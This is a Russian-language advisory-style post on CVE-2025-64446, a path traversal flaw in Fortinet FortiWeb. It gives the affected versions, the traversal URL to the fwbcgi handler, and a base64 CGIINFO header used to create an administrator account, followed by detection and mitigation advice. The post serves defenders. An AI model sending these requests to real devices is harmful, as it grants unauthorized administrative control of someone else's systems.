CVE-2025-64446 — уязвимость обхода относительного пути в Fortinet. Уязвимые версии: Fortinet FortiWeb 8.0.0–8.0.1, FortiWeb 7.6.0–7.6.4, FortiWeb 7.4.0–7.4.9, FortiWeb 7.2.0–7.2.11, FortiWeb 7.0.0–7.0.11.
👽 Метрики
Base Score: 9.8 CRITICAL
CWE: CWE-23
👽 Об уязвимости
Сканирования системы могут начаться с простого — с проверки доступности фала
fwbcgi. Файл fwbcgi отвечает за обработку определённых запросов CGI, в том числе аутентификацию и выполнение административных команд. Сканирование на доступность начинается с GET- или POST-запроса на:
/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi
Ответ:
{"errcode": "0", "message": "(null)"}Означает: файл доступен.
Уязвимость усугубляется тем, что злоумышленник может отправить запрос на создание нового пользователя с ролью «Администратор». Для этого отправляется POST на вышеуказанный
/../../../../../cgi-bin/fwbcgi с заголовками вида (указано в формате ключ – значение):{'CGIINFO': 'eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==', 'Content-Type': 'application/x-www-form-urlencoded'}И телом, которое представляет собой JSON с данными нового пользователя.
Небольшое уточнение: часть /api/v регистронезависима.
👽 Как защищаться
1) Блокирующее правило WAF/IDS на запросы к /api/v.., которые содержат в пути попытки обхода директорий
../. Также необходимо учесть, что злоумышленник в атаках может использовать методы обхода стандартных сигнатур WAF/IDS. Например, как на скриншоте.2) Проверка обращений к /fwbcgi из внешней сети.
3) Обновление.
4) Ревизия недавно созданных пользователей.
